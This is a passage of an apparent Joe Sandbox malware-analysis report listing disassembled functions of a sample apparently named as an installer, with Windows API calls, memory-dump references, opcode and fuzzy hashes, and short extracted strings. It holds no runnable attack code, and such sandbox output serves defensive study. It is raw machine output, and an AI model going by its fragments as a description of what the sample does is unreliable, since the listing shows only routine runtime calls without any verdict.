                                        • Part of subcall function 6CB8961E: CloseHandle.KERNEL32(FFFFFFFE,6CB895DD,?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?,6CB7E7C0), ref: 6CB8962E
                                      • ___initconout.LIBCMT ref: 6CB895DD
                                        • Part of subcall function 6CB895FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CB8959B,6CB8822E,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?), ref: 6CB89612
                                      • WriteConsoleW.KERNEL32(00000000,?,6CB87DDC,00000000,?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?), ref: 6CB895F2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: 4e4cb3a478da6032b689f1268b380fc399b29fbf2e70ad5d14d0500a1a9109dc
                                      • Instruction ID: 41764a03c64397f65ae43909e731ee81ac712b1172bba9617dacb1d849b92bfc
                                      • Opcode Fuzzy Hash: 4e4cb3a478da6032b689f1268b380fc399b29fbf2e70ad5d14d0500a1a9109dc
                                      • Instruction Fuzzy Hash: 26F03036A01269BBCF121F92CC449DD3F76FF0A7B5B044010FE0996660DB728860DBD1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: x'K$|'K
                                      • API String ID: 3519838083-1041342148
                                      • Opcode ID: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                      • Instruction ID: ff933efdcc3a7667329a995594a017423bd02bc71795d27ea15c68c64936ba10
                                      • Opcode Fuzzy Hash: a25bbfd597e839604be9dc74c608115d2298b3d137bba62e84176c22df84cc64
                                      • Instruction Fuzzy Hash: A5D109308447C69ADB21DBB4C850AEEBB75EF02308F20455ED4B6A3F90DBA5694FC752
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog3_
                                      • String ID: 8Q
                                      • API String ID: 2427045233-4022487301
                                      • Opcode ID: 263f1fee230c937b4042103e4712709da1264103f8667b5acd610551795ee879
                                      • Instruction ID: 860cac8f6acf1777ffb3ccd0fbe6884bba7fcc914646683719571caa6c5ca369
                                      • Opcode Fuzzy Hash: 263f1fee230c937b4042103e4712709da1264103f8667b5acd610551795ee879
                                      • Instruction Fuzzy Hash: 4F71C670D452969BDF318F95C8406EE7A75EF45318F24822AEC30E7A40DB758845C772
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @$hfJ
                                      • API String ID: 3519838083-1391159562
                                      • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                      • Instruction ID: faef3b7e4a9af8d980b4c9bd7115827cd2f029d9805ccaac846e98efabfd1df9
                                      • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                      • Instruction Fuzzy Hash: 36911970A10299DFCB10DFA9C894DEEBBB4FF19308F54452EE455E7A50D770A948CB12
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBBBC5D
                                        • Part of subcall function 6CBBA61A: __EH_prolog.LIBCMT ref: 6CBBA61F
                                        • Part of subcall function 6CBBAA2E: __EH_prolog.LIBCMT ref: 6CBBAA33
                                        • Part of subcall function 6CBBBEA5: __EH_prolog.LIBCMT ref: 6CBBBEAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: WZJ
                                      • API String ID: 3519838083-1089469559
                                      • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                      • Instruction ID: 3a7ded59a9a9f7661e715ff09ab149f60f1e30a15e810fda0e2fd5f2848795fd
                                      • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                      • Instruction Fuzzy Hash: 0F814935D00198DFCB15DFA8D990AEDBBB4AF09308F1040AAE516777A0DF30AE49CB61
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 6CA32A76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: Jbx$Jbx
                                      • API String ID: 4194217158-1161259238
                                      • Opcode ID: c107500332ab40d30c27b793988276cc0d111445fb19567bdbe8101b1c8ef25e
                                      • Instruction ID: ca6b3276cf782a8f33609fa39e4d81f065146f7028481e01862427aa73beec41
                                      • Opcode Fuzzy Hash: c107500332ab40d30c27b793988276cc0d111445fb19567bdbe8101b1c8ef25e
                                      • Instruction Fuzzy Hash: 825103B1D002148FCB10CF69D8946AEBBB5EF89314F14866EE849DBB42E331D985CBD1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: <dJ$Q
                                      • API String ID: 3519838083-2252229148
                                      • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                      • Instruction ID: 0dc9999b2c206afcf2e0d9fd9f6662101a48144e28aa273c1d9ee076e8ba9b81
                                      • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                      • Instruction Fuzzy Hash: 8E519B71A04289EFCF00DFA9D8809EDB7B5FF49318F50852EE511AB650D7319A4ACB12
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $D^J
                                      • API String ID: 3519838083-3977321784
                                      • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                      • Instruction ID: 822f25ed716ddb1d6fa14a0340e7ec2deeadbedf0f42081536bc3acd2123b1f9
                                      • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                      • Instruction Fuzzy Hash: 6A413B20A045E05ED7229B6884907FCBBAAEF17308F1481D8C4926BEF1DF74598AC3D2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 8)L$8)L
                                      • API String ID: 3519838083-2235878380
                                      • Opcode ID: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                      • Instruction ID: 4795da1e6c167ddf4754fb29072385aac39dd583dcaac770a2c5f8b5956c991c
                                      • Opcode Fuzzy Hash: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                      • Instruction Fuzzy Hash: 6851BE31205A80DFC714DFA4E990AEEBBF1FF85308F65456ED59A87A60CB307848CB55
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: qJ$#
                                      • API String ID: 3519838083-4209149730
                                      • Opcode ID: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                      • Instruction ID: 7fd4be731b0731a2ea9392bb9f94b280d98eeeb34aa8b18a5b0310f88cb4c6bd
                                      • Opcode Fuzzy Hash: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                      • Instruction Fuzzy Hash: 1F517C35A002C9DFCF00CFA8C5819EDBBB5EF19328F148559E811A7791D734EA19CBA2
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CB87DC6), ref: 6CB8070B
                                      • __dosmaperr.LIBCMT ref: 6CB80712
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr
                                      • String ID: 8Q
                                      • API String ID: 1659562826-4022487301
                                      • Opcode ID: 23478db8cb693bab3828ec6befc663a23532fdcdcfcf0d0c8d2a1398ac92e133
                                      • Instruction ID: 56936176e8616c7095fecf2d63fabd8c7e03a0280f3c9daaa27cff041feb2953
                                      • Opcode Fuzzy Hash: 23478db8cb693bab3828ec6befc663a23532fdcdcfcf0d0c8d2a1398ac92e133
                                      • Instruction Fuzzy Hash: 1141A9716071C4AFDB11CF29D890BA97FF5EF87394F244259E8808B645D3318C118BA0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: X&L$p|J
                                      • API String ID: 3519838083-2944591232
                                      • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                      • Instruction ID: 49122cf1e952097b3d01f933e795a2f6623db5eb9d3404f1cf9e9e4a60d5655e
                                      • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                      • Instruction Fuzzy Hash: F8314C31AC59C5CBD7019B5CDD01BAD7771EB0672AF221137D401A2EA2CB63B989CBD2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 0|J$`)L
                                      • API String ID: 3519838083-117937767
                                      • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                      • Instruction ID: 70791d2c67bcce392742b94ba40abaeb9b0739f2238d9bf2a37a9a42d5411562
                                      • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                      • Instruction Fuzzy Hash: B941A0716057C5EFCB119F60C8907EEBBE2FF46208F15442EE05AA7710CB716908CB92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID: 3333
                                      • API String ID: 3732870572-2924271548
                                      • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                      • Instruction ID: ef8a1c3da0c9f79d3594b024a281b4a6da0e20a49dc5ae9908308cc44b6ed100
                                      • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                      • Instruction Fuzzy Hash: 6A21A7B09407546FD730CFBA8880B5BFAFDEB84715F10891EA18AD7B40D771A9048B65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: #$4qJ
                                      • API String ID: 3519838083-3965466581
                                      • Opcode ID: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                      • Instruction ID: bdcf680fc4cf930ab3346ff8a533d149343ce63c62c14a55acabdbde4fae6a21
                                      • Opcode Fuzzy Hash: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                      • Instruction Fuzzy Hash: AF31BA35A052D8DFEF10CF55C881AAE73B4EF49319F044169E811ABA50D730AD05CBA2
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CB6C2BD
                                      • ___raise_securityfailure.LIBCMT ref: 6CB6C3A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                      • String ID: Lh>
                                      • API String ID: 3761405300-2363018161
                                      • Opcode ID: 5a05a44e5d951ee5dbc3537617fa239d7274e70866fd7c2fdfc25c1e5a9aea1b
                                      • Instruction ID: 10a7f4cb705d98e2c8f01d541ae329991b0f1c8bd926843061c2cb06bf64104f
                                      • Opcode Fuzzy Hash: 5a05a44e5d951ee5dbc3537617fa239d7274e70866fd7c2fdfc25c1e5a9aea1b
                                      • Instruction Fuzzy Hash: AB2132B87102009BDF00DF2BD755A603BF4FB8A314F1099AAE904CB790E3B49980EF84
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @$LuJ
                                      • API String ID: 3519838083-205571748
                                      • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                      • Instruction ID: 5f44a6e24163bf41e2cc060a742ab996899821ef11fcc6b0f3dee895204b3756
                                      • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                      • Instruction Fuzzy Hash: ED018072E05349DACB10DFE9C8805AEF7B4FF59704F40842EE56AE3A41C338A945CB99
                                      APIs
                                      • _free.LIBCMT ref: 6CB81439
                                      • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CB7DD2A,?,00000004,?,4B42FCB6,?,?,6CB72E7C,4B42FCB6,?), ref: 6CB81475
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free
                                      • String ID: 8Q
                                      • API String ID: 1080816511-4022487301
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE0185
                                        • Part of subcall function 6CBE022B: __EH_prolog.LIBCMT ref: 6CBE0230
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J
                                      • API String ID: 3519838083-2882003284
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBDDFCC
                                        • Part of subcall function 6CBDD4D1: __EH_prolog.LIBCMT ref: 6CBDD4D6
                                        • Part of subcall function 6CBDC14B: __EH_prolog.LIBCMT ref: 6CBDC150
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J
                                      • API String ID: 3519838083-2882003284
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBFE439
                                        • Part of subcall function 6CBFE4BA: __EH_prolog.LIBCMT ref: 6CBFE4BF
                                        • Part of subcall function 6CBE022B: __EH_prolog.LIBCMT ref: 6CBE0230
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: D.K$T.K
                                      • API String ID: 3519838083-2437000251
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 8)L$8rJ
                                      • API String ID: 3519838083-896068166
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prologctype
                                      • String ID: \~J
                                      • API String ID: 3037903784-3176329776
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prologctype
                                      • String ID: |zJ
                                      • API String ID: 3037903784-3782439380
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBDC0E0
                                        • Part of subcall function 6CBDC14B: __EH_prolog.LIBCMT ref: 6CBDC150
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J
                                      • API String ID: 3519838083-2882003284
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @ K$DJ$T)K$X/K
                                      • API String ID: 0-3815299647
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D)K$H)K$P)K$T)K
                                      • API String ID: 0-2262112463
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (?K$8?K$H?K$CK
                                      • API String ID: 0-3450752836
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      Joe Sandbox IDA Plugin
